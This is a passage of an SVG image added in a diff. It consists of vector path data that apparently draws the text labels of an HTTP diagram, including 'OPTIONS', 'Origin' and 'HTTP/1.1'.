407.6825,594.375 L408.502812,594.375 L408.502812,606 L407.502812,606 Z" id="/img-HTTP/-1.1-Copy" fill="#D3DDE2"></path>
+            <g id="Group-2" transform="translate(231.000000, 278.000000)" fill="#D3DDE2">
+                <path d="M85.83,17.359375 L91.3065625,4.171875 L92.189375,4.171875 L86.705,17.359375 L85.83,17.359375 Z M94.9725,16 L94.9725,7.4375 L95.9490625,7.4375 L95.9490625,16 L94.9725,16 Z M94.9725,5.6875 L94.9725,4.375 L95.94125,4.375 L95.94125,5.6875 L94.9725,5.6875 Z M99.2009374,16 C99.1853124,10.8228908 99.1774999,7.96875266 99.1774999,7.4375 L100.02125,7.4375 L100.14625,8.75 C100.396251,8.32291453 100.769945,7.97135555 101.267344,7.6953125 C101.764742,7.41926945 102.29208,7.28125 102.849375,7.28125 C104.219173,7.28125 105.07854,7.82030711 105.4275,8.8984375 C106.036878,7.82030711 106.997806,7.28125 108.310312,7.28125 C109.247817,7.28125 109.936612,7.54817441 110.376719,8.08203125 C110.816825,8.61588809 111.036875,9.41145305 111.036875,10.46875 L111.036875,16 L110.068125,16 L110.068125,11.8125 C110.068125,11.4166647 110.062917,11.0859388 110.0525,10.8203125 C110.042083,10.5546862 110.017344,10.2656266 109.978281,9.953125 C109.939219,9.64062344 109.879323,9.38541766 109.798594,9.1875 C109.717864,8.98958234 109.612396,8.80208422 109.482187,8.625 C109.351978,8.44791578 109.185313,8.31770875 108.982187,8.234375 C108.779061,8.15104125 108.53948,8.109375 108.263437,8.109375 C107.607184,8.109375 107.0512,8.30338348 106.595469,8.69140625 C106.139737,9.07942902 105.823334,9.62499648 105.64625,10.328125 C105.656667,10.8593777 105.669687,11.2708319 105.685312,11.5625 L105.685312,16 L104.724375,16 L104.724375,11.640625 C104.724375,11.1979145 104.711354,10.8138037 104.685312,10.4882812 C104.659271,10.1627588 104.607188,9.84375156 104.529062,9.53125 C104.450937,9.21874844 104.345469,8.96354266 104.212656,8.765625 C104.079843,8.56770734 103.902761,8.40885477 103.681406,8.2890625 C103.460051,8.16927023 103.195731,8.109375 102.888437,8.109375 C102.180101,8.109375 101.587659,8.2981752 101.111094,8.67578125 C100.634529,9.0533873 100.325938,9.56770508 100.185312,10.21875 C100.174896,10.4322927 100.169687,10.7369772 100.169687,11.1328125 L100.169687,16 L99.2009374,16 Z M115.429375,19.9765625 L115.312187,19.109375 L117.124687,19.109375 C117.525731,19.109375 117.879894,19.0742191 118.187187,19.0039062 C118.494481,18.9335934 118.753593,18.8424485 118.964531,18.7304688 C119.17547,18.618489 119.355155,18.4622406 119.503594,18.2617188 C119.652032,18.0611969 119.767916,17.8619802 119.85125,17.6640625 C119.934584,17.4661448 119.998385,17.209637 120.042656,16.8945312 C120.086927,16.5794255 120.114271,16.2903659 120.124687,16.0273438 C120.135104,15.7643216 120.140312,15.4322937 120.140312,15.03125 C120.140312,15.088542 120.135104,15.0755213 120.124687,14.9921875 L120.085625,14.453125 C119.757498,14.9479191 119.369481,15.3294257 118.921562,15.5976562 C118.473644,15.8658868 117.926774,16 117.280937,16 C116.770518,16 116.305679,15.9088551 115.886406,15.7265625 C115.467133,15.5442699 115.123387,15.3072931 114.855156,15.015625 C114.586926,14.7239569 114.361668,14.3906269 114.179375,14.015625 C113.997082,13.6406231 113.866875,13.2669289 113.78875,12.8945312 C113.710625,12.5221336 113.671562,12.1536477 113.671562,11.7890625 C113.671562,11.3307269 113.709322,10.8945333 113.784844,10.4804688 C113.860365,10.0664042 113.991874,9.66146031 114.179375,9.265625 C114.366876,8.86978969 114.601249,8.5273452 114.8825,8.23828125 C115.163751,7.9492173 115.525727,7.71744879 115.968437,7.54296875 C116.411148,7.36848871 116.911143,7.28125 117.468437,7.28125 C118.015315,7.28125 118.498383,7.38932184 118.917656,7.60546875 C119.336929,7.82161566 119.726248,8.1666643 120.085625,8.640625 L120.179375,7.4375 L121.03875,7.4375 L121.03875,15.375 C121.03875,15.7187517 121.034844,15.9960927 121.027031,16.2070312 C121.019219,16.4179698 120.987969,16.7044253 120.933281,17.0664062 C120.878593,17.4283872 120.803073,17.7252593 120.706719,17.9570312 C120.610364,18.1888032 120.46323,18.4453111 120.265312,18.7265625 C120.067395,19.0078139 119.829116,19.2291659 119.550469,19.390625 C119.271821,19.5520841 118.915054,19.6901036 118.480156,19.8046875 C118.045258,19.9192714 117.551774,19.9765625 116.999687,19.9765625 L115.429375,19.9765625 Z M117.405937,15.2109375 C117.786148,15.2109375 118.129894,15.1497402 118.437187,15.0273438 C118.744481,14.9049473 118.998384,14.7434906 119.198906,14.5429688 C119.399428,14.3424469 119.568697,14.1067722 119.706719,13.8359375 C119.84474,13.5651028 119.942395,13.2851577 119.999687,12.9960938 C120.056979,12.7070298 120.085625,12.4088557 120.085625,12.1015625 L120.085625,11.2109375 C120.085625,10.8046855 120.036146,10.4218768 119.937187,10.0625 C119.838229,9.7031232 119.685886,9.37109527 119.480156,9.06640625 C119.274426,8.76171723 118.991877,8.52083422 118.6325,8.34375 C118.273123,8.16666578 117.856461,8.078125 117.3825,8.078125 C116.997081,8.078125 116.649429,8.15234301 116.339531,8.30078125 C116.029634,8.44921949 115.77573,8.64583211 115.577812,8.890625 C115.379895,9.13541789 115.21323,9.42187336 115.077812,9.75 C114.942395,10.0781266 114.847344,10.4127587 114.792656,10.7539062 C114.737968,11.0950538 114.710625,11.4453107 114.710625,11.8046875 C114.710625,12.1223974 114.735364,12.4309881 114.784844,12.7304688 C114.834323,13.0299494 114.922864,13.3333318 115.050469,13.640625 C115.178073,13.9479182 115.340832,14.2148426 115.53875,14.4414062 C115.736668,14.6679699 115.99578,14.8528639 116.316094,14.9960938 C116.636408,15.1393236 116.999685,15.2109375 117.405937,15.2109375 Z M128.82375,16 L128.82375,4.375 L129.82375,4.375 L129.82375,9.515625 L136.495625,9.515625 L136.495625,4.375 L137.495625,4.375 L137.495625,16 L136.495625,16 L136.495625,10.390625 L129.82375,10.390625 L129.82375,16 L128.82375,16 Z M143.46625,16 L143.46625,5.234375 L139.81,5.234375 L139.81,4.375 L148.138125,4.375 L148.138125,5.234375 L144.481875,5.234375 L144.481875,16 L143.46625,16 Z M152.749375,16 L152.749375,5.234375 L149.093125,5.234375 L149.093125,4.375 L157.42125,4.375 L157.42125,5.234375 L153.765,5.234375 L153.765,16 L152.749375,16 Z M159.735625,16 L159.735625,4.375 L163.290312,4.375 C163.790315,4.375 164.246039,4.42838488 164.6575,4.53515625 C165.06896,4.64192762 165.44005,4.80729055 165.770781,5.03125 C166.101512,5.25520945 166.35802,5.55859184 166.540312,5.94140625 C166.722605,6.32422066 166.81375,6.77083078 166.81375,7.28125 C166.81375,7.57812648 166.799427,7.8450509 166.770781,8.08203125 C166.742135,8.3190116 166.68875,8.56249875 166.610625,8.8125 C166.532499,9.06250125 166.427032,9.28124906 166.294219,9.46875 C166.161405,9.65625094 165.986928,9.83593664 165.770781,10.0078125 C165.554634,10.1796884 165.299428,10.320312 165.005156,10.4296875 C164.710884,10.539063 164.358023,10.6249997 163.946562,10.6875 C163.535102,10.7500003 163.071565,10.78125 162.555937,10.78125 C162.003851,10.78125 161.399691,10.7473962 160.743437,10.6796875 L160.743437,16 L159.735625,16 Z M162.6575,9.9140625 C163.26167,9.9140625 163.774685,9.85416727 164.196562,9.734375 C164.618439,9.61458273 164.93354,9.47916742 165.141875,9.328125 C165.350209,9.17708258 165.509062,8.96354305 165.618437,8.6875 C165.727813,8.41145695 165.78901,8.190105 165.802031,8.0234375 C165.815052,7.85677 165.821562,7.62239734 165.821562,7.3203125 L165.821562,7.2734375 C165.821562,6.59114242 165.589794,6.083335 165.12625,5.75 C164.662706,5.416665 164.063754,5.25 163.329375,5.25 L160.743437,5.25 L160.743437,9.8203125 C161.201773,9.88281281 161.839787,9.9140625 162.6575,9.9140625 Z M168.64375,17.359375 L174.120312,4.171875 L175.003125,4.171875 L169.51875,17.359375 L168.64375,17.359375 Z M183.124062,16 L183.124062,5.40625 C182.957395,5.52604227 182.693075,5.67447828 182.331094,5.8515625 C181.969113,6.02864672 181.608439,6.17968688 181.249062,6.3046875 L181.249062,5.4609375 C182.342818,4.95572664 183.027707,4.59375109 183.30375,4.375 L184.124062,4.375 L184.124062,16 L183.124062,16 Z M188.75875,16.0625 C188.482707,16.0625 188.274375,15.9817716 188.13375,15.8203125 C187.993124,15.6588534 187.922812,15.4687511 187.922812,15.25 C187.922812,15.0364573 187.993124,14.8489591 188.13375,14.6875 C188.274375,14.5260409 188.482707,14.4453125 188.75875,14.4453125 C189.04521,14.4453125 189.258749,14.5260409 189.399375,14.6875 C189.54,14.8489591 189.610312,15.0364573 189.610312,15.25 C189.610312,15.4687511 189.54,15.6588534 189.399375,15.8203125 C189.258749,15.9817716 189.04521,16.0625 188.75875,16.0625 Z M193.502812,16 L193.502812,5.40625 C193.336145,5.52604227 193.071824,5.67447828 192.709844,5.8515625 C192.347863,6.02864672 191.987189,6.17968688 191.627812,6.3046875 L191.627812,5.4609375 C192.721568,4.95572664 193.406457,4.59375109 193.6825,4.375 L194.502812,4.375 L194.502812,16 L193.502812,16 Z" id="/img-HTTP/-1.1"></path>
+                <g id="Group-4">
+                    <path d="M6.3671875,15.559375 C7.32552563,15.559375 8.13150715,15.3406272 8.78515625,14.903125 C9.43880535,14.4656228 9.91796723,13.8653684 10.2226562,13.1023438 C10.5273453,12.3393191 10.6796875,11.4317761 10.6796875,10.3796875 C10.6796875,8.73384594 10.3151078,7.46042117 9.5859375,6.559375 C8.85676719,5.65832883 7.78646539,5.2078125 6.375,5.2078125 C4.95311789,5.2078125 3.87109746,5.65702676 3.12890625,6.55546875 C2.38671504,7.45391074 2.015625,8.72863758 2.015625,10.3796875 C2.015625,11.9786538 2.3841109,13.241662 3.12109375,14.16875 C3.8580766,15.095838 4.94009703,15.559375 6.3671875,15.559375 Z M6.3671875,16.3796875 C5.48176641,16.3796875 4.69140973,16.2325536 3.99609375,15.9382813 C3.30077777,15.6440089 2.73047098,15.2299506 2.28515625,14.6960938 C1.83984152,14.1622369 1.50130324,13.5307328 1.26953125,12.8015625 C1.03775926,12.0723922 0.921875,11.2677127 0.921875,10.3875 C0.921875,8.54374078 1.39713066,7.08021375 2.34765625,5.996875 C3.29818184,4.91353625 4.64061633,4.371875 6.375,4.371875 C8.07813352,4.371875 9.40624523,4.91744246 10.359375,6.00859375 C11.3125048,7.09974504 11.7890625,8.56197 11.7890625,10.3953125 C11.7890625,11.2546918 11.6718762,12.0476526 11.4375,12.7742188 C11.2031238,13.5007849 10.8632835,14.132289 10.4179688,14.66875 C9.97265402,15.205211 9.4036493,15.6244777 8.7109375,15.9265625 C8.0182257,16.2286473 7.23698352,16.3796875 6.3671875,16.3796875 Z M14.9628125,16.2 L14.9628125,4.575 L18.5175,4.575 C19.0175025,4.575 19.4732271,4.62838488 19.8846875,4.73515625 C20.2961479,4.84192762 20.6672379,5.00729055 20.9979687,5.23125 C21.3286996,5.45520945 21.5852074,5.75859184 21.7675,6.14140625 C21.9497926,6.52422066 22.0409375,6.97083078 22.0409375,7.48125 C22.0409375,7.77812648 22.0266147,8.0450509 21.9979687,8.28203125 C21.9693228,8.5190116 21.9159379,8.76249875 21.8378125,9.0125 C21.7596871,9.26250125 21.6542194,9.48124906 21.5214062,9.66875 C21.3885931,9.85625094 21.2141156,10.0359366 20.9979687,10.2078125 C20.7818218,10.3796884 20.526616,10.520312 20.2323437,10.6296875 C19.9380714,10.739063 19.5852104,10.8249997 19.17375,10.8875 C18.7622896,10.9500003 18.2987526,10.98125 17.783125,10.98125 C17.2310389,10.98125 16.6268783,10.9473962 15.970625,10.8796875 L15.970625,16.2 L14.9628125,16.2 Z M17.8846875,10.1140625 C18.4888572,10.1140625 19.0018729,10.0541673 19.42375,9.934375 C19.8456271,9.81458273 20.1607281,9.67916742 20.3690625,9.528125 C20.5773969,9.37708258 20.7362494,9.16354305 20.845625,8.8875 C20.9550005,8.61145695 21.0161978,8.390105 21.0292187,8.2234375 C21.0422396,8.05677 21.04875,7.82239734 21.04875,7.5203125 L21.04875,7.4734375 C21.04875,6.79114242 20.8169815,6.283335 20.3534375,5.95 C19.8898935,5.616665 19.2909412,5.45 18.5565625,5.45 L15.970625,5.45 L15.970625,10.0203125 C16.4289606,10.0828128 17.0669751,10.1140625 17.8846875,10.1140625 Z M27.206875,16.2 L27.206875,5.434375 L23.550625,5.434375 L23.550625,4.575 L31.87875,4.575 L31.87875,5.434375 L28.2225,5.434375 L28.2225,16.2 L27.206875,16.2 Z M34.2790624,16.2 L34.2790624,4.575 L35.2790624,4.575 L35.2790624,16.2 L34.2790624,16.2 Z M43.9840624,15.559375 C44.9424006,15.559375 45.7483821,15.3406272 46.4020312,14.903125 C47.0556803,14.4656228 47.5348422,13.8653684 47.8395312,13.1023438 C48.1442202,12.3393191 48.2965624,11.4317761 48.2965624,10.3796875 C48.2965624,8.73384594 47.9319827,7.46042117 47.2028124,6.559375 C46.4736421,5.65832883 45.4033403,5.2078125 43.9918749,5.2078125 C42.5699928,5.2078125 41.4879724,5.65702676 40.7457812,6.55546875 C40.00359,7.45391074 39.6324999,8.72863758 39.6324999,10.3796875 C39.6324999,11.9786538 40.0009858,13.241662 40.7379687,14.16875 C41.4749515,15.095838 42.556972,15.559375 43.9840624,15.559375 Z M43.9840624,16.3796875 C43.0986413,16.3796875 42.3082847,16.2325536 41.6129687,15.9382813 C40.9176527,15.6440089 40.3473459,15.2299506 39.9020312,14.6960938 C39.4567165,14.1622369 39.1181782,13.5307328 38.8864062,12.8015625 C38.6546342,12.0723922 38.5387499,11.2677127 38.5387499,10.3875 C38.5387499,8.54374078 39.0140056,7.08021375 39.9645312,5.996875 C40.9150568,4.91353625 42.2574913,4.371875 43.9918749,4.371875 C45.6950084,4.371875 47.0231202,4.91744246 47.9762499,6.00859375 C48.9293797,7.09974504 49.4059374,8.56197 49.4059374,10.3953125 C49.4059374,11.2546918 49.2887511,12.0476526 49.0543749,12.7742188 C48.8199988,13.5007849 48.4801584,14.132289 48.0348437,14.66875 C47.589529,15.205211 47.0205242,15.6244777 46.3278124,15.9265625 C45.6351006,16.2286473 44.8538584,16.3796875 43.9840624,16.3796875 Z M52.5796874,16.2 L52.5796874,4.575 L53.7437499,4.575 L60.1421874,14.3796875 L60.5562499,14.95 C60.5197914,13.3458253 60.5015624,12.3484395 60.5015624,11.9578125 L60.5015624,4.575 L61.4468749,4.575 L61.4468749,16.2 L60.2593749,16.2 L53.8765624,6.4109375 L53.4781249,5.840625 C53.5197918,7.01250586 53.5406249,8.02291242 53.5406249,8.871875 L53.5406249,16.2 L52.5796874,16.2 Z M68.8393749,16.3796875 C67.854995,16.3796875 66.985212,16.2755219 66.2299999,16.0671875 C65.4747878,15.8588531 64.8888561,15.6296888 64.4721874,15.3796875 L64.8471874,14.66875 C65.9461512,15.262503 67.3055126,15.559375 68.9253124,15.559375 C69.8159419,15.559375 70.5021329,15.3276065 70.9839061,14.8640625 C71.4656794,14.4005185 71.7065624,13.7468792 71.7065624,12.903125 C71.7065624,12.5906234 71.6779169,12.3276052 71.6206249,12.1140625 C71.5633329,11.9005198 71.4565632,11.6960947 71.3003124,11.5007813 C71.1440616,11.3054678 70.9161993,11.1414069 70.6167186,11.0085938 C70.317238,10.8757806 69.9357314,10.7625005 69.4721874,10.66875 L67.5971874,10.29375 C66.5503072,10.0854156 65.7651588,9.75729391 65.2417186,9.309375 C64.7182785,8.86145609 64.4565624,8.22344164 64.4565624,7.3953125 C64.4565624,6.85885148 64.560728,6.39401238 64.7690624,6.00078125 C64.9773968,5.60755012 65.278175,5.29375117 65.6714061,5.059375 C66.0646373,4.82499883 66.5203619,4.65182348 67.0385936,4.53984375 C67.5568254,4.42786402 68.1466633,4.371875 68.8081249,4.371875 C69.4643782,4.371875 70.1062988,4.45260336 70.7339061,4.6140625 C71.3615135,4.77552164 71.8758312,4.95781148 72.2768749,5.1609375 L72.0190624,5.9265625 C71.7117692,5.75468664 71.2573467,5.59192785 70.6557811,5.43828125 C70.0542156,5.28463465 69.430524,5.2078125 68.7846874,5.2078125 C67.6857236,5.2078125 66.860211,5.39140441 66.3081249,5.75859375 C65.7560388,6.12578309 65.4799999,6.70520438 65.4799999,7.496875 C65.4799999,7.99166914 65.6544773,8.38880059 66.0034374,8.68828125 C66.3523975,8.98776191 66.8680173,9.21041594 67.5503124,9.35625 L69.6440624,9.7859375 C70.1648983,9.89531305 70.6063002,10.0255201 70.9682811,10.1765625 C71.3302621,10.3276049 71.6505714,10.5229155 71.9292186,10.7625 C72.2078659,11.0020845 72.4148951,11.3002586 72.5503124,11.6570313 C72.6857297,12.0138039 72.7534374,12.4369767 72.7534374,12.9265625 C72.7534374,14.020318 72.3953681,14.8692678 71.6792186,15.4734375 C70.9630692,16.0776072 70.0164641,16.3796875 68.8393749,16.3796875 Z" id="OPTIONS"></path>
+                    <path d="M6.3671875,44.059375 C7.32552563,44.059375 8.13150715,43.8406272 8.78515625,43.403125 C9.43880535,42.9656228 9.91796723,42.3653684 10.2226562,41.6023438 C10.5273453,40.8393191 10.6796875,39.9317761 10.6796875,38.8796875 C10.6796875,37.2338459 10.3151078,35.9604212 9.5859375,35.059375 C8.85676719,34.1583288 7.78646539,33.7078125 6.375,33.7078125 C4.95311789,33.7078125 3.87109746,34.1570268 3.12890625,35.0554688 C2.38671504,35.9539107 2.015625,37.2286376 2.015625,38.8796875 C2.015625,40.4786538 2.3841109,41.741662 3.12109375,42.66875 C3.8580766,43.595838 4.94009703,44.059375 6.3671875,44.059375 Z M6.3671875,44.8796875 C5.48176641,44.8796875 4.69140973,44.7325536 3.99609375,44.4382813 C3.30077777,44.1440089 2.73047098,43.7299506 2.28515625,43.1960938 C1.83984152,42.6622369 1.50130324,42.0307328 1.26953125,41.3015625 C1.03775926,40.5723922 0.921875,39.7677127 0.921875,38.8875 C0.921875,37.0437408 1.39713066,35.5802138 2.34765625,34.496875 C3.29818184,33.4135363 4.64061633,32.871875 6.375,32.871875 C8.07813352,32.871875 9.40624523,33.4174425 10.359375,34.5085938 C11.3125048,35.599745 11.7890625,37.06197 11.7890625,38.8953125 C11.7890625,39.7546918 11.6718762,40.5476526 11.4375,41.2742188 C11.2031238,42.0007849 10.8632835,42.632289 10.4179688,43.16875 C9.97265402,43.705211 9.4036493,44.1244777 8.7109375,44.4265625 C8.0182257,44.7286473 7.23698352,44.8796875 6.3671875,44.8796875 Z M14.9628125,44.7 L14.9628125,33.075 L18.2753125,33.075 C18.6971896,33.075 19.0630714,33.0828124 19.3729687,33.0984375 C19.6828661,33.1140626 19.9992692,33.1479164 20.3221875,33.2 C20.6451058,33.2520836 20.9198426,33.3210933 21.1464062,33.4070313 C21.3729699,33.4929692 21.5891135,33.6088534 21.7948437,33.7546875 C22.0005739,33.9005216 22.1659369,34.0763011 22.2909375,34.2820313 C22.4159381,34.4877614 22.5135934,34.7338527 22.5839062,35.0203125 C22.6542191,35.3067723 22.689375,35.6322898 22.689375,35.996875 C22.689375,36.7104202 22.5148976,37.3223933 22.1659375,37.8328125 C21.8169774,38.3432317 21.2831286,38.6895824 20.564375,38.871875 C20.8768765,39.5125032 21.1112492,39.9994775 21.2675,40.3328125 L23.17375,44.7 L22.0096875,44.7 L20.3690625,40.7234375 C20.2596869,40.4630195 20.0148977,39.9005252 19.6346875,39.0359375 C19.5305203,39.0515626 19.1451075,39.059375 18.4784375,39.059375 L15.9628125,39.0125 L15.9628125,44.7 L14.9628125,44.7 Z M18.908125,38.23125 C19.9445885,38.23125 20.6685396,38.0502622 21.08,37.6882813 C21.4914604,37.3263003 21.6971875,36.7677121 21.6971875,36.0125 C21.6971875,35.3354133 21.5109914,34.8158872 21.1385937,34.4539063 C20.766196,34.0919253 20.1320878,33.9109375 19.23625,33.9109375 L15.9628125,33.9109375 L15.9628125,38.2078125 C17.1867769,38.2234376 18.168538,38.23125 18.908125,38.23125 Z M26.2928125,44.7 L26.2928125,33.075 L27.2928125,33.075 L27.2928125,44.7 L26.2928125,44.7 Z M36.0446874,44.8796875 C35.3363506,44.8796875 34.6840133,44.7794281 34.0876562,44.5789063 C33.4912991,44.3783844 32.9769813,44.0984393 32.5446874,43.7390625 C32.1123936,43.3796857 31.7465119,42.9513046 31.4470312,42.4539063 C31.1475505,41.9565079 30.9235944,41.4096384 30.7751562,40.8132813 C30.626718,40.2169241 30.5524999,39.58542 30.5524999,38.91875 C30.5524999,37.7468691 30.7712478,36.7091191 31.2087499,35.8054688 C31.6462521,34.9018184 32.2985894,34.1869818 33.1657812,33.6609375 C34.032973,33.1348932 35.0603065,32.871875 36.2478124,32.871875 C37.5499023,32.871875 38.7061407,33.1713512 39.7165624,33.7703125 L39.2712499,34.575 C38.8441645,34.314582 38.3610964,34.1049487 37.8220312,33.9460938 C37.282966,33.7872388 36.7608358,33.7078125 36.2556249,33.7078125 C35.4952045,33.7078125 34.8168258,33.8432278 34.2204687,34.1140625 C33.6241116,34.3848972 33.1410435,34.7585914 32.7712499,35.2351563 C32.4014564,35.7117211 32.1215113,36.2598927 31.9314062,36.8796875 C31.7413011,37.4994823 31.6462499,38.1739547 31.6462499,38.903125 C31.6462499,39.6791705 31.7426032,40.3796844 31.9353124,41.0046875 C32.1280217,41.6296906 32.4170814,42.1700498 32.8024999,42.6257813 C33.1879185,43.0815127 33.6827053,43.4330717 34.2868749,43.6804688 C34.8910446,43.9278658 35.5889543,44.0515625 36.3806249,44.0515625 C37.1983374,44.0515625 38.09937,43.856252 39.0837499,43.465625 L39.0837499,39.746875 L36.2009374,39.746875 L36.2634374,38.8796875 L40.0134374,38.8796875 L40.0134374,44.0046875 C39.3780176,44.3328141 38.7621383,44.5606764 38.1657812,44.6882813 C37.5694241,44.8158861 36.8623999,44.8796875 36.0446874,44.8796875 Z M43.4449999,44.7 L43.4449999,33.075 L44.4449999,33.075 L44.4449999,44.7 L43.4449999,44.7 Z M48.2046874,44.7 L48.2046874,33.075 L49.3687499,33.075 L55.7671874,42.8796875 L56.1812499,43.45 C56.1447914,41.8458253 56.1265624,40.8484395 56.1265624,40.4578125 L56.1265624,33.075 L57.0718749,33.075 L57.0718749,44.7 L55.8843749,44.7 L49.5015624,34.9109375 L49.1031249,34.340625 C49.1447918,35.5125059 49.1656249,36.5229124 49.1656249,37.371875 L49.1656249,44.7 L48.2046874,44.7 Z M60.6284374,44.9890625 L60.6284374,43.340625 L62.0268749,43.340625 L62.0268749,44.9890625 L60.6284374,44.9890625 Z M60.6284374,37.4578125 L60.6284374,35.825 L62.0268749,35.825 L62.0268749,37.4578125 L60.6284374,37.4578125 Z M72.2337499,44.8953125 C71.6816638,44.8953125 71.1634398,44.8276048 70.6790624,44.6921875 C70.1946849,44.5567702 69.8118763,44.3953134 69.5306249,44.2078125 L69.6712499,43.3953125 C70.5306292,43.8432314 71.3535376,44.0671875 72.1399999,44.0671875 C73.5514653,44.0671875 74.2832288,43.5437552 74.3353124,42.496875 C74.3353124,42.0593728 74.1933867,41.7156263 73.9095311,41.465625 C73.6256755,41.2156238 73.0566708,40.9552097 72.2024999,40.684375 C71.754581,40.5281242 71.5071876,40.4421876 71.4603124,40.4265625 C70.121764,40.0203105 69.4472916,39.2989635 69.4368749,38.2625 C69.4368749,37.6635387 69.7011951,37.1335961 70.2298436,36.6726563 C70.7584921,36.2117164 71.4733287,35.98125 72.3743749,35.98125 C73.275421,35.98125 74.1217667,36.1583316 74.9134374,36.5125 L74.5853124,37.23125 C73.783225,36.9291652 73.0384408,36.778125 72.3509374,36.778125 C71.7467677,36.778125 71.271512,36.9135403 70.9251561,37.184375 C70.5788002,37.4552097 70.4056249,37.8197894 70.4056249,38.278125 C70.4056249,38.6635436 70.518905,38.9591136 70.7454686,39.1648438 C70.9720322,39.3705739 71.4212465,39.5671866 72.0931249,39.7546875 C72.1660419,39.7755209 72.3001551,39.8223955 72.4954686,39.8953125 C72.6907821,39.9682295 72.7988539,40.0072916 72.8196874,40.0125 C73.7207335,40.288543 74.3496335,40.6153627 74.7064061,40.9929688 C75.0631787,41.3705748 75.2415624,41.8848926 75.2415624,42.5359375 C75.2259373,43.2859413 74.9459922,43.8666646 74.4017186,44.278125 C73.8574451,44.6895854 73.134796,44.8953125 72.2337499,44.8953125 Z M81.4074998,44.8875 C80.2252023,44.8875 79.2864096,44.4916706 78.5910936,43.7 C77.8957776,42.9083294 77.5481248,41.8354234 77.5481248,40.48125 C77.5481248,39.1739518 77.8879652,38.10365 78.5676561,37.2703125 C79.247347,36.436975 80.1262445,36.0072918 81.2043748,35.98125 C82.2095882,35.98125 83.0168718,36.3406214 83.6262498,37.059375 C84.2356279,37.7781286 84.5403123,38.7416606 84.5403123,39.95 C84.5403123,39.9968752 84.5390103,40.0919264 84.5364061,40.2351563 C84.5338019,40.3783861 84.5324998,40.4786455 84.5324998,40.5359375 L78.5715623,40.5359375 C78.5819791,41.6349013 78.8476014,42.5059864 79.3684373,43.1492188 C79.8892733,43.7924511 80.5767664,44.1140625 81.4309373,44.1140625 C81.9882318,44.1140625 82.472602,44.048959 82.8840623,43.91875 C83.2955227,43.788541 83.7252059,43.603647 84.1731248,43.3640625 L84.3371873,44.090625 C83.4725997,44.6218777 82.496047,44.8875 81.4074998,44.8875 Z M78.6106248,39.7546875 L83.4856248,39.7546875 C83.4856248,38.8015577 83.2798977,38.0710963 82.8684373,37.5632813 C82.456977,37.0554662 81.8918784,36.8015625 81.1731248,36.8015625 C80.4439545,36.8015625 79.8554188,37.0723931 79.4074998,37.6140625 C78.9595809,38.1557319 78.6939586,38.8692664 78.6106248,39.7546875 Z M87.3234373,44.7 C87.3130206,39.6739332 87.3078123,36.8197951 87.3078123,36.1375 L88.1046873,36.1375 L88.1671873,37.825 C88.4744805,37.3145808 88.8651016,36.8979183 89.3390623,36.575 C89.813023,36.2520817 90.3078098,36.090625 90.8234373,36.090625 C91.0369801,36.090625 91.2661444,36.108854 91.5109373,36.1453125 L91.4406248,36.95 C91.2531239,36.9187498 91.0552092,36.903125 90.8468748,36.903125 C90.1229129,36.903125 89.514846,37.1882784 89.0226561,37.7585938 C88.5304661,38.3289091 88.2843748,39.0046836 88.2843748,39.7859375 L88.2843748,44.7 L87.3234373,44.7 Z M95.8487498,44.7 L92.5831248,36.1375 L93.6221873,36.1375 L95.6065623,41.5359375 C95.7107295,41.8744809 95.8344262,42.2351543 95.9776561,42.6179688 C96.1208859,43.0007832 96.2367702,43.2989573 96.3253123,43.5125 L96.4581248,43.8328125 C96.5570836,43.4994775 96.6859886,43.1414082 96.8448436,42.7585938 C97.0036985,42.3757793 97.1482283,41.9760438 97.2784373,41.559375 C97.419063,41.1114561 97.6742688,40.4356816 98.0440623,39.5320313 C98.4138558,38.6283809 98.8174976,37.4968818 99.2549998,36.1375 L100.294062,36.1375 L96.9737498,44.7 L95.8487498,44.7 Z M105.749062,44.8875 C104.566765,44.8875 103.627972,44.4916706 102.932656,43.7 C102.23734,42.9083294 101.889687,41.8354234 101.889687,40.48125 C101.889687,39.1739518 102.229528,38.10365 102.909219,37.2703125 C103.588909,36.436975 104.467807,36.0072918 105.545937,35.98125 C106.551151,35.98125 107.358434,36.3406214 107.967812,37.059375 C108.57719,37.7781286 108.881875,38.7416606 108.881875,39.95 C108.881875,39.9968752 108.880573,40.0919264 108.877969,40.2351563 C108.875364,40.3783861 108.874062,40.4786455 108.874062,40.5359375 L102.913125,40.5359375 C102.923542,41.6349013 103.189164,42.5059864 103.71,43.1492188 C104.230836,43.7924511 104.918329,44.1140625 105.7725,44.1140625 C106.329794,44.1140625 106.814164,44.048959 107.225625,43.91875 C107.637085,43.788541 108.066768,43.603647 108.514687,43.3640625 L108.67875,44.090625 C107.814162,44.6218777 106.837609,44.8875 105.749062,44.8875 Z M102.952187,39.7546875 L107.827187,39.7546875 C107.827187,38.8015577 107.62146,38.0710963 107.21,37.5632813 C106.798539,37.0554662 106.233441,36.8015625 105.514687,36.8015625 C104.785517,36.8015625 104.196981,37.0723931 103.749062,37.6140625 C103.301143,38.1557319 103.035521,38.8692664 102.952187,39.7546875 Z M111.665,44.7 C111.654583,39.6739332 111.649375,36.8197951 111.649375,36.1375 L112.44625,36.1375 L112.50875,37.825 C112.816043,37.3145808 113.206664,36.8979183 113.680625,36.575 C114.154585,36.2520817 114.649372,36.090625 115.165,36.090625 C115.378543,36.090625 115.607707,36.108854 115.8525,36.1453125 L115.782187,36.95 C115.594686,36.9187498 115.396772,36.903125 115.188437,36.903125 C114.464475,36.903125 113.856408,37.1882784 113.364219,37.7585938 C112.872029,38.3289091 112.625937,39.0046836 112.625937,39.7859375 L112.625937,44.7 L111.665,44.7 Z M116.96375,44.7 L121.502812,33.075 L122.46375,33.075 L126.83875,44.7 L125.8075,44.7 L124.323125,40.7546875 L119.502812,40.7546875 L117.955937,44.7 L116.96375,44.7 Z M119.885625,40.0203125 L123.96375,40.0203125 C122.791869,36.6557123 122.127813,34.6765655 121.971562,34.0828125 C121.909062,34.3119803 121.703335,34.9213492 121.354375,35.9109375 C121.005415,36.9005258 120.672085,37.8328081 120.354375,38.7078125 L119.885625,40.0203125 Z M129.98125,44.7625 C129.705207,44.7625 129.496875,44.6817716 129.35625,44.5203125 C129.215624,44.3588534 129.145312,44.1687511 129.145312,43.95 C129.145312,43.7364573 129.215624,43.5489591 129.35625,43.3875 C129.496875,43.2260409 129.705207,43.1453125 129.98125,43.1453125 C130.26771,43.1453125 130.481249,43.2260409 130.621875,43.3875 C130.7625,43.5489591 130.832812,43.7364573 130.832812,43.95 C130.832812,44.1687511 130.7625,44.3588534 130.621875,44.5203125 C130.481249,44.6817716 130.26771,44.7625 129.98125,44.7625 Z M137.303437,44.8875 C136.475308,44.8875 135.756565,44.684377 135.147187,44.278125 